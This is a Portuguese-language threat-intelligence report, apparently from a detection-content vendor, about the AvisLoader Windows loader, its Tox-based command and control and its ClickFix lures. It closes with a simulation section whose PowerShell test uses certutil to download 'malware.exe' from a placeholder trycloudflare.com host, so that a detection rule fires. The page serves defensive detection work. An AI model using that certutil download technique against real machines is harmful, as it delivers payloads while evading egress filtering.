SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoader Surge como um Carregador Malware Resiliente para Windows

Author Photo
SOC Prime Team linkedin icon Seguir
AvisLoader Surge como um Carregador Malware Resiliente para Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

AvisLoader é um loader de malware do Windows recém-identificado que utiliza a rede de mensagens peer-to-peer (P2P) Tox para comunicação de comando e controle (C2). Esta abordagem descentralizada permite que os operadores mantenham a conectividade e relocação dos controladores sem depender de domínios fixos ou servidores centralizados. O malware é comumente distribuído por meio de iscas de engenharia social ClickFix hospedadas na infraestrutura Cloudflare.

Investigação

Os Laboratórios de Ameaças da Varonis descobriram o loader em um servidor de staging exposto junto com seu centro de comando e ferramentas relacionadas. A investigação identificou uma isca ClickFix com tema do DocuSign que instrui os usuários a executar comandos que recuperam cargas úteis através dos Túneles Rápidos do Cloudflare. A análise do executável encontrou comunicação C2 baseada em Tox, funcionalidade de bypass do UAC e módulos projetados para ocultar processos maliciosos.

Mitigação

As organizações devem treinar os usuários para reconhecer e reportar solicitações de assinatura de documentos que os instruam a colar comandos em terminais ou no diálogo Executar do Windows. As equipes de segurança devem monitorar o uso suspeito de Workers do Cloudflare e Túneles Rápidos em iscas baseadas na web. Detectar tráfego inesperado da rede peer-to-peer (P2P) e mudanças não autorizadas nos atalhos da área de trabalho também pode ajudar a reduzir o risco.

Resposta

Quando a atividade do AvisLoader é detectada, as equipes de segurança devem revisar a linhagem do processo de shells de comando e interpretadores de script lançados após visitas a domínios suspeitos. Inspecione endpoints em busca de atalhos modificados, .backup arquivos, e o artefato VLCAssistant . A telemetria da rede também deve ser revisada quanto ao tráfego incomum do protocolo Tox originário de hosts afetados.

Fluxo do Ataque

Ainda estamos atualizando esta parte.

Detecções

Executável Suspeito Contendo Apenas Números no Nome (via cmdline)

Equipe SOC Prime
24 Set 2026

Comunicação de Domínio Trycloudflare Suspeita (via DNS)

Equipe SOC Prime
24 Set 2026

Tentativa de Execução Curl Suspeita [MacOS] (via cmdline)

Equipe SOC Prime
24 Set 2026

IOCs (HashSha256) para detectar: Conheça o AvisLoader: Um Loader para Windows Construído para Sobreviver a uma Derrubada

Regras AI do SOC Prime
24 Set 2026

Detectar Tráfego Tox ou Peer-to-Peer Inesperado [Conexão de Rede do Windows]

Regras AI do SOC Prime
24 Set 2026

Detecção de Execução Remota de Código via Shell de Comando e Túnel Rápido do Cloudflare [Criação de Processo do Windows]

Regras AI do SOC Prime
24 Set 2026

Execução de Simulação

  • Narrativa do Ataque & Comandos: Um adversário obteve acesso inicial a uma estação de trabalho. Para manter a persistência e baixar sua carga útil modular secundária, ele utiliza um Túnel Rápido do Cloudflare para contornar o filtragem de saída. O atacante utiliza certutil.exe, uma utilidade integrada no Windows, para baixar a carga útil de https://malicious-tunnel-id.trycloudflare.com/payload.exe. Este método é escolhido porque certutil é um binário confiável e o tráfego parece estar se dirigindo para uma infraestrutura legítima do Cloudflare, tornando-o menos provável de ser sinalizado por filtros básicos de reputação de rede.

  • Script de Teste de Regressão:

    # Script de simulação para acionar a regra de detecção.
    # Este usa o certutil para tentar um download de um endereço trycloudflare.com.
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] Simulando atividade do adversário: Baixando de $targetUrl via certutil..."
    
    # O seguinte comando é projetado para acionar as condições 'selection_tunnel' E 'selection_tools'.
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Comando de simulação executado com sucesso."
    } else {
        Write-Host "[-] Comando falhou (Esperado se a URL for inexistente, mas a telemetria ainda deve ser gerada)."
    }
  • Comandos de Limpeza:

    # Script de limpeza para remover a carga útil simulada e artefatos locais.
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] Limpou $tempFile"
    } else {
        Write-Host "[-] Nenhum artefato encontrado para limpar."
    }